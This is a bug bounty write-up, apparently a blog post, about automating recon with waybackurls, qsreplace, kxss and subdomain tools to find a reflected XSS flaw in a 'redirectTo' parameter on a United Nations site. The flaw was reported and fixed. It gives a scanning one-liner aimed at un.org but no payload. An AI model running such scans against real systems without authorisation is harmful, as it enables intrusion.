This article is going to be about how I got my name in the United Nations hall of fame for finding a reflected XSS bug as I slept.
If you are a beginner in bug hunting you must've read a ton of articles for understanding XSS bugs and finding them. Me too!
The classic methodology to find them is…
- collect all the URLs from ‘waybackurls’ or ‘gau’
- select all the links that require parameters(have ‘=’ in them)
- parse all the links to ‘kxss’ and look for the links that dont unfilter characters like <,>,”,’
- target those links and try to inject code on those parameters(for the basic methodology of finding XSS read https://vikaran101.medium.com/reflected-xss-on-byjus-my-first-bug-a5bbab098748)
Using all these points to form a one-liner(‘qsreplace’ here helps in parsing the unique links to kxss and saveing time)…
waybackurls un.org | grep = | qsreplace test | kxss
But the basic methodology is a little longer(collecting all alive domains, taking screenshots etc).
Recon tasks like this are long and boring and I always spent the first half-hour of hunting, where my concentration is at its max to run such boring and repetitive tasks. Also, a lot of long scans would be interrupted due to problems like the network and battery.
Setting up a Virtual Private Server
The solutions to these problems were quite easy. To solve the 2nd problem, I decided to use a VPS from Digital Ocean. I set up a Linux server and installed the necessary tools. Ran the commands inside a ‘tmux’ pane so that my sessions would be saved even if I log out.
As I ran waybackurls on the target, I noticed something very weird about the tool.
Case 1: If I run waybackurls on un.org for all the subs I get web archive links for that domain from all the subdomain.
>> waybackurls un.org
In the example you see above I get only 2 results from ‘x.un.org’ but in case 2…
Case 2: Running ‘waybackurls’ only on ‘x.un.org’
>> waybackurls x.un.org
I realised that I get more results for a given subdomain if I give it separately to the tool. This meant that to increase my attack surface, I must run waybackurls on every subdomain. It is not like I have the patience to do that, so I decided to code a script for it.
I added this code along with some other code to collect domains from tools like ‘subfinder’, ‘amass’ and ‘findomain’. Then to extract all the alive domains from ‘http’, then use that list to give to the ‘recursive_wayback()’. Once the list was created I piped it to ‘kxss’. Once I had the list of all the URLs with their list of unfiltered characters, I was free to look for points vulnerable to reflected XSS.
I started the scan before I went to sleep. When I woke after ̶8̶ 6 hours the report was ready.
Once I found that the ‘redirectTo’ parameter doesn't filter <,>,”,’, I knew I could trigger an XSS vulnerability.
Reported: 16th April 2022
Fixed: 21st April 2022
Acknowledged: 25th April 2022